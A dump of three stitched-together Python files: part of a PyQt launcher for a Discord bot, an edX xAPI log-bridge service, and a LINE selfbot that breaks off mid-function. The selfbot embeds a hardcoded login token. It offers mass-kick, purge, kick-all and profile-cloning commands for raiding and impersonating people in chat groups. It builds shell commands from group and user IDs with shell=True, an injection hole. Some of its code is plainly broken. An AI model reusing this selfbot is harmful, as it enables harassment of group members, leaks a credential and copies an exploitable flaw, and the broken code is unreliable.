self.centralwidget.setObjectName("centralwidget")
self.startButton = QtWidgets.QPushButton(self.centralwidget)
self.startButton.setGeometry(QtCore.QRect(110, 220, 301, 101))
font = QtGui.QFont()
font.setFamily("Arial Black")
font.setPointSize(34)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.startButton.setFont(font)
self.startButton.setMouseTracking(False)
self.startButton.setObjectName("startButton")
self.Title = QtWidgets.QLabel(self.centralwidget)
self.Title.setGeometry(QtCore.QRect(170, 15, 311, 101))
font = QtGui.QFont()
font.setFamily("Amiri Quran")
font.setPointSize(48)
self.Title.setFont(font)
self.Title.setObjectName("Title")
self.directoryButton = QtWidgets.QPushButton(self.centralwidget)
self.directoryButton.setGeometry(QtCore.QRect(170, 330, 171, 41))
self.directoryButton.setObjectName("directoryButton")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(180, 130, 221, 28))
font = QtGui.QFont()
font.setPointSize(12)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(70, 30, 111, 101))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("resources/91_Discord_logo_logos-512.webp"))
self.label_2.setScaledContents(True)
self.label_2.setObjectName("label_2")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.directoryButton.clicked.connect(self.openDirectory)
self.startButton.clicked.connect(self.clicked)
self.directoryNoExist = QtWidgets.QLabel(self.centralwidget)
self.directoryNoExist.setGeometry(QtCore.QRect(50, 370, 461, 31))
font = QtGui.QFont()
font.setPointSize(10)
self.directoryNoExist.setFont(font)
self.directoryNoExist.setObjectName("directoryNoExist")
self.directoryNoExist.setStyleSheet("color: red")
self.directoryNoExist.hide()
self.startButton.setStyleSheet("background-color: green")
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "RogueBot"))
MainWindow.setWindowIcon(QIcon("../91_Discord_logo_logos-512.webp"))
self.startButton.setText(_translate("MainWindow", "Start"))
self.Title.setText(_translate("MainWindow", "RogueBot"))
self.directoryButton.setText(_translate("MainWindow", "Open Configuration Directory"))
self.label.setText(_translate("MainWindow", "Made by Rogue#0478"))
self.directoryNoExist.setText(_translate("MainWindow", "The configuration directory doesn\'t exist. Please run the bot once to create it."))
if __name__ == "__main__":
multiprocessing.freeze_support()
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
app.setStyleSheet(qdarkstyle.load_stylesheet())
MainWindow.show()
sys.exit(app.exec_()) |
__main__.py | """Main process with queue management and remote LRS communication."""
from datetime import datetime
import json
import logging
import os
import signal
import sys
import threading
import time
from pyinotify import WatchManager, Notifier, NotifierError, EventsCodes, ProcessEvent
from tincan import statement_list
from xapi_bridge import client
from xapi_bridge import converter
from xapi_bridge import exceptions
from xapi_bridge import settings
if settings.HTTP_PUBLISH_STATUS is True:
from xapi_bridge import server
logger = logging.getLogger('edX-xapi-bridge main')
class QueueManager:
"""Manages the batching and publishing of statements in a thread-safe way."""
def __init__(self):
self.cache = []
self.cache_lock = threading.Lock()
self.publish_timer = None
self.publish_retries = 0
self.total_published_successfully = 0
def __del__(self):
self.destroy()
def destroy(self):
if self.publish_timer is not None:
self.publish_timer.cancel()
def push(self, stmt):
"""Add a statement to the outgoing queue."""
# push statement to queue
with self.cache_lock:
self.cache.append(stmt)
# set timeout to publish statements
if len(self.cache) == 1 and settings.PUBLISH_MAX_WAIT_TIME > 0:
self.publish_timer = threading.Timer(settings.PUBLISH_MAX_WAIT_TIME, self.publish)
self.publish_timer.start()
# publish immediately if statement threshold is reached
if settings.PUBLISH_MAX_PAYLOAD <= len(self.cache):
self.publish()
def publish(self):
"""Publish the queued statements to the LRS and clear the queue."""
# make sure no new statements are added while publishing
with self.cache_lock:
# build StatementList
lrs_success = False
statements = statement_list.StatementList(self.cache)
while lrs_success is False and len(statements) > 0:
try:
lrs_resp = client.lrs_publisher.publish_statements(statements)
lrs_success = True
self.publish_retries = 0 # reset retries
self.total_published_successfully += len(statements)
logger.error("{} statements published successfully".format(self.total_published_successfully))
if getattr(settings, 'TEST_LOAD_SUCCESSFUL_STATEMENTS_BENCHMARK', 0) > 0:
benchmark = settings.TEST_LOAD_SUCCESSFUL_STATEMENTS_BENCHMARK
if self.total_published_successfully >= benchmark:
logger.error("published {} or more statements at {}".format(benchmark, datetime.now()))
except exceptions.XAPIBridgeLRSConnectionError as e:
# if it was an auth problem, fail
# if it was a connection problem, retry
if self.publish_retries <= settings.PUBLISH_MAX_RETRIES:
self.publish_retries += 1
else:
e.err_fail()
break
except exceptions.XAPIBridgeStatementStorageError as e:
# remove the failed Statement from StatementList
# and retry, logging non-failing exception
e.message = "Removing rejected Statement and retrying publishing StatementList. Rejected Statement was {}. LRS message was {}".format(e.statement.to_json(), e.message)
e.err_continue_msg()
statements.remove(e.statement)
# clear the cache and cancel publish timer whether successful or not
self.cache = []
if self.publish_timer is not None:
self.publish_timer.cancel()
class NotifierLostINodeException(NotifierError):
"""Exception to handle inotify loss of current watched inode."""
class TailHandler(ProcessEvent):
"""Parse incoming log events, convert to xapi, and add to publish queue."""
# watch create and moved to events since tracking log may be re-created during log rotation
# example inotifywatch /edx/var/log/tracking/tracking.log output:
# (after performing a sudo logrotate --force /edx/var/log/tracking/tracking.log)
# total access modify attrib close_write open move_self delete_self filename
# 30 16 7 1 2 1 1 1 /edx/var/log/tracking/tracking.log
# depending on the kernel and underlying inotify, either or both of IN_MOVE_SELF or IN_DELETE_SELF will fire
# exit the handler on whichever fires first
MASK = EventsCodes.OP_FLAGS['IN_MODIFY'] | EventsCodes.OP_FLAGS['IN_MOVE_SELF'] | EventsCodes.OP_FLAGS['IN_DELETE_SELF']
def my_init(self, **kw):
# called via __init__ on superclass
# prepare file input stream
self.ifp = open(kw['filename'], 'r', 1)
self.ifp.seek(0, 2)
self.publish_queue = QueueManager()
self.raceBuffer = ''
def __enter__(self):
return self
def __exit__(self, etype, value, traceback):
# flush queue before exiting
self.publish_queue.publish()
self.publish_queue.destroy()
self.ifp.close()
def process_IN_MODIFY(self, event):
"""Handle any changes to the log file."""
# read all new contents from the end of the file
buff = self.raceBuffer + self.ifp.read()
# if there's no newline at end of file, we probably read it before edx finished writing
# add read contents to a buffer and return
if len(buff) != 0 and buff[-1] != '\n':
self.raceBuffer = buff
else:
self.raceBuffer = ''
evts = [i for i in buff.split('\n') if len(i) != 0]
for e in evts:
try:
evt_obj = json.loads(e)
except ValueError:
logger.warn('Could not parse JSON for', e)
continue
xapi = None
try:
xapi = converter.to_xapi(evt_obj)
except (exceptions.XAPIBridgeStatementConversionError, ) as e:
e.err_continue_msg()
if xapi is not None:
for i in xapi:
self.publish_queue.push(i)
# print u'{} - {} {} {}'.format(i['timestamp'], i['actor']['name'], i['verb']['display']['en-US'], i['object']['definition']['name']['en-US'])
def process_IN_MOVE_SELF(self, event):
"""Handle moved tracking log file; e.g., during log rotation."""
msg = "caught inotify IN_MOVE_SELF (tracking log file moved)"
logger.info(msg)
raise NotifierLostINodeException(msg)
def process_IN_DELETE_SELF(self, event):
"""Handle deletion of tracking log file e.g., during log rotation."""
msg = "caught inotify IN_DELETE_SELF (tracking log file deleted)"
logger.info(msg)
raise NotifierLostINodeException(msg)
def watch(watch_file):
"""Watch the given file for changes."""
logger.error('Starting watch')
wm = WatchManager()
try:
with TailHandler(filename=watch_file) as th:
logger.error('adding pyinotify watcher/notifier')
notifier = Notifier(wm, th, read_freq=settings.NOTIFIER_READ_FREQ, timeout=settings.NOTIFIER_POLL_TIMEOUT)
wm.add_watch(watch_file, TailHandler.MASK)
notifier.loop()
except NotifierLostINodeException:
# end and restart watch
logger.error("stopping notifier and restarting watch")
notifier.stop() # close inotify instance
watch(watch_file)
finally:
logger.error('Exiting watch')
def signal_terminate_handler(signum, frame):
"""Handle terminating signals from terminal or sysctl to properly shut down."""
if settings.HTTP_PUBLISH_STATUS is True:
logger.info("Shutting down http server")
http_server.shutdown()
http_server.socket.close()
thread.join(2.0)
raise SystemExit
for sig in (signal.SIGHUP, signal.SIGINT, signal.SIGTERM, signal.SIGABRT):
signal.signal(sig, signal_terminate_handler)
if __name__ == '__main__':
if getattr(settings, 'DEBUG_MODE', False):
logging.basicConfig(
format='%(levelname)s:%(message)s',
level=logging.DEBUG
)
else:
logging.basicConfig(
#filename='/edx/var/log/xapi/xapi_bridge.log',
#filemode='a+',
#format='%(levelname)s:%(message)s',
#level=logging.INFO
)
if settings.HTTP_PUBLISH_STATUS is True:
# open a TCP socket and HTTP server for simple OK status response
# for service uptime monitoring
http_server = server.httpd
thread = threading.Thread(target=http_server.serve_forever)
thread.daemon = True
thread.start()
# try to connect to the LRS immediately
lrs = client.lrs
resp = lrs.about()
if resp.success:
logger.error('Successfully connected to remote LRS at {}. Described by {}'.format(settings.LRS_ENDPOINT, resp.data))
else:
e = exceptions.XAPIBridgeLRSConnectionError(resp)
e.err_fail()
log_path = os.path.abspath(sys.argv[1]) if len(sys.argv) > 1 else '/edx/var/log/tracking/tracking.log'
logger.error('Watching file {}, starting time {}'.format(log_path, str(datetime.now())))
watch(log_path)
|
CatBot_Selfbot.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,ast,os,subprocess,requests
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="EnliZjabbWniaqdsPTt5.nqZhqiZgZilGvU4eyth5jq.4DldEayovtSgtlpllfy/HiizJIJKmojjW1RC3eFY7RE=")
cl.loginResult()
print "===[Login Success]==="
helpMessage ="""
====={List Keyword]=====
► Help
► Creator
► Gcreator
► List group:
► Leave group:
► Cancel
► Url:on/off
► Autojoin:on/off
► Autocancel:on/off
► Qr:on/off
► Autokick:on/off
► Contact:on/off
► Gift (1,2,3)
► Tagall
► Setview
► Viewseen
► Boom
► Add all
► Recover
► Remove all chat
► Gn: (name)
► Kick: (mid)
► Invite: (mid)
► Welcome
► Bc: (text)
► Cancelall
► Gurl
► Self Like
► Speed
► Ban
► Unban
► Copy @
► Backup me
► Ban @
► Unban @
► Banlist
► Kill ban
"""
mid = cl.getProfile().mid["u350cc7408cc6cc82e056ee046131f925"]
Creator=["u350cc7408cc6cc82e056ee046131f925"]
admin=["u350cc7408cc6cc82e056ee046131f925"]
contact = cl.getProfile()
profile = cl.getProfile()
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
wait = {
"LeaveRoom":True,
"AutoJoin":True,
"Members":0,
"AutoCancel":False,
"AutoKick":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Qr":True,
"Timeline":True,
"Contact":True,
"lang":"JP",
"BlGroup":{}
}
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if mid in op.param3:
if wait["AutoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
if wait["AutoCancel"] == True:
if op.param3 in admin:
pass
else:
cl.cancelGroupInvitation(op.param1, [op.param3])
else:
if op.param3 in wait["blacklist"]:
cl.cancelGroupInvitation(op.param1, [op.param3])
cl.sendText(op.param1, "Itu kicker jgn di invite!")
else:
pass
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
if op.param2 in admin:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------NOTIFIED_UPDATE_GROUP---------------------
if op.type == 11:
if wait["Qr"] == True:
if op.param2 in admin:
pass
else:
cl.sendText(msg.to, "Jangan mainan QR ntr ada kicker")
else:
pass
#--------------------------SEND_MESSAGE---------------------------
if op.type == 25:
msg = op.message
#----------------------------------------------------------------------------
if msg.contentType == 13:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] not in admin:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
else:
cl.sendText(msg.to,"Admin Detected~")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
#--------------------------------------------------------
elif wait["Contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
#--------------------------------------------------------
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"[Group name]\n" + str(ginfo.name) + "\n\n[Gid]\n" + msg.to + "\n\n[Group creator]\n" + gCreator + "\n\n[Profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "members\nPending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------------
elif msg.text is None:
return
#--------------------------------------------------------
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Yang Bikin BOT")
#--------------------------------------------------------
elif msg.text in ["Group creator","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"Itu Yang Buat Grup Ini")
#--------------------------------------------------------
elif msg.contentType == 16:
if wait["Timeline"] == True:
msg.contentType = 0
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
#--------------------------------------------------------
elif msg.text in ["Key","help","Help"]:
cl.sendText(msg.to,helpMessage)
#--------------------------------------------------------
elif msg.text in ["List group"]:
gid = cl.getGroupIdsJoined()
h = ""
jml = 0
for i in gid:
gn = cl.getGroup(i).name
h += "♦【%s】\n" % (gn)
jml += 1
cl.sendText(msg.to,"======[List Group]======\n"+ h +"Total group: "+str(jml))
#--------------------------------------------------------
elif "Leave group: " in msg.text:
ng = msg.text.replace("Leave group: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bye "+h+"~")
cl.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
else:
pass
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["cancel","Cancel"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
cl.sendText(msg.to,"No one is inviting")
else:
Cl.sendText(msg.to,"Can not be used outside the group")
#--------------------------------------------------------
elif msg.text in ["Ourl","Url:on"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
cl.sendText(msg.to,"Url Active")
else:
cl.sendText(msg.to,"Can not be used outside the group")
#--------------------------------------------------------
elif msg.text in ["Curl","Url:off"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
cl.sendText(msg.to,"Url inActive")
else:
cl.sendText(msg.to,"Can not be used outside the group")
#--------------------------------------------------------
elif msg.text in ["Join on","Autojoin:on"]:
wait["AutoJoin"] = True
cl.sendText(msg.to,"AutoJoin Active")
elif msg.text in ["Join off","Autojoin:off"]:
wait["AutoJoin"] = False
cl.sendText(msg.to,"AutoJoin inActive")
#--------------------------------------------------------
elif msg.text in ["Autocancel:on"]:
wait["AutoCancel"] = True
cl.sendText(msg.to,"The group of people and below decided to automatically refuse invitation")
print wait["AutoCancel"][msg.to]
elif msg.text in ["Autocancel:off"]:
wait["AutoCancel"] = False
cl.sendText(msg.to,"Invitation refused turned off")
print wait["AutoCancel"][msg.to]
#--------------------------------------------------------
elif "Qr:on" in msg.text:
wait["Qr"] = True
cl.sendText(msg.to,"QR Protect Active")
elif "Qr:off" in msg.text:
wait["Qr"] = False
cl.sendText(msg.to,"Qr Protect inActive")
#--------------------------------------------------------
elif "Autokick:on" in msg.text:
wait["AutoKick"] = True
cl.sendText(msg.to,"AutoKick Active")
elif "Autokick:off" in msg.text:
wait["AutoKick"] = False
cl.sendText(msg.to,"AutoKick inActive")
#--------------------------------------------------------
elif msg.text in ["K on","Contact:on"]:
wait["Contact"] = True
cl.sendText(msg.to,"Contact Active")
elif msg.text in ["K off","Contact:off"]:
wait["Contact"] = False
cl.sendText(msg.to,"Contact inActive")
#--------------------------------------------------------
elif msg.text in ["Set"]:
md = ""
if wait["AutoJoin"] == True: md+="✦ Auto join : on\n"
else: md +="✦ Auto join : off\n"
if wait["Contact"] == True: md+="✦ Info Contact : on\n"
else: md+="✦ Info Contact : off\n"
if wait["AutoCancel"] == True:md+="✦ Auto cancel : on\n"
else: md+= "✦ Auto cancel : off\n"
if wait["Qr"] == True: md+="✦ Qr Protect : on\n"
else:md+="✦ Qr Protect : off\n"
if wait["AutoKick"] == True: md+="✦ Autokick : on\n"
else:md+="✦ Autokick : off"
cl.sendText(msg.to,"=====[Status]=====\n"+md)
#--------------------------------------------------------
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
#--------------------------------------------------------
elif "Tagall" == msg.text:
group = cl.getGroup(msg.to)
mem = [contact.mid for contact in group.members]
for mm in mem:
xname = cl.getContact(mm).displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata = {'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as e:
print str(e)
#--------------------------CEK SIDER------------------------------
elif "Setview" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
cl.sendText(msg.to, "Checkpoint checked!")
print "@setview"
elif "Viewseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
conName.append('nones')
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
tukang = "List Viewer\n*"
grp = '\n* '.join(str(f) for f in dataResult)
total = '\n\nTotal %i viewers (%s)' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "%s %s %s" % (tukang, grp, total))
else:
cl.sendText(msg.to, "Belum ada viewers")
print "@viewseen"
#--------------------------------------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
cl.kickoutFromGroup(msg.to,[mention['M']])
#--------------------------------------------------------
elif "Add all" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#--------------------------------------------------------
elif ("Gn: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn: ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------------
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
if midd not in admin:
cl.kickoutFromGroup(msg.to,[midd])
else:
cl.sendText(msg.to,"Admin Detected")
#--------------------------------------------------------
elif "Invite: " in msg.text:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------------
elif msg.text in ["#welcome","Welcome","welcome","Welkam","welkam"]:
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat datang di "+ gs.name)
#--------------------------------------------------------
elif "Bc: " in msg.text:
bc = msg.text.replace("Bc: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i,"=======[BROADCAST]=======\n\n"+bc+"\n\nContact Me : line.me/ti/p/~@xpk5386g")
cl.sendText(msg.to,"Success BC BosQ")
#--------------------------------------------------------
elif msg.text in ["Cancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
cl.sendText(msg.to,"All invitations have been refused")
#--------------------------------------------------------
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------------
elif msg.text in ["Self Like"]:
try:
print "activity"
url = cl.activity(limit=1)
print url
cl.like(url['result']['posts'][0]['userInfo']['mid'], url['result']['posts'][0]['postInfo']['postId'], likeType=1001)
cl.comment(url['result']['posts'][0]['userInfo']['mid'], url['result']['posts'][0]['postInfo']['postId'], "Mau Kenal?\n ID LINE :boy29putra\nLalu kenalan ama dia")
cl.sendText(msg.to, "Success~")
except Exception as E:
try:
cl.sendText(msg.to,str(E))
except:
pass
#--------------------------------------------------------
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
print("Speed")
elapsed_time = time.time() - start
cl.sendText(msg.to, "Progress...")
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#--------------------------------------------------------
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#--------------------------------------------------------
elif "Backup me" in msg.text:
try:
cl.updateDisplayPicture(profile.pictureStatus)
cl.updateProfile(profile)
cl.sendText(msg.to, "Success backup profile")
except Exception as e:
cl.sendText(msg.to, str(e))
#--------------------------------------------------------
elif "Copy " in msg.text:
copy0 = msg.text.replace("Copy ","")
copy1 = copy0.lstrip()
copy2 = copy1.replace("@","")
copy3 = copy2.rstrip()
_name = copy3
group = cl.getGroup(msg.to)
for contact in group.members:
cname = cl.getContact(contact.mid).displayName
if cname == _name:
cl.CloneContactProfile(contact.mid)
cl.sendText(msg.to, "Success~")
else:
pass
#--------------------------------------------------------
elif "Ban @" in msg.text:
if msg.toType == 2:
print "@Ban by mention"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in admin:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes BosQ")
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Admin Detected~")
#--------------------------------------------------------
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"===[Blacklist User]===\n"+mc)
#--------------------------------------------------------
elif "Unban @" in msg.text:
if msg.toType == 2:
print "@Unban by mention"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes BosQ")
except:
cl.sendText(msg.to,"Succes BosQ")
#--------------------------------------------------------
elif msg.text in ["Kill ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.kickoutFromGroup(msg.to,[jj])
cl.sendText(msg.to,"Blacklist emang pantas tuk di usir")
#--------------------------------------------------------
elif "Cleanse" in msg.text:
if msg.toType == 2:
print "Kick all member"
_name = msg.text.replace("Cleanse","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Dadaaah~")
targets = []
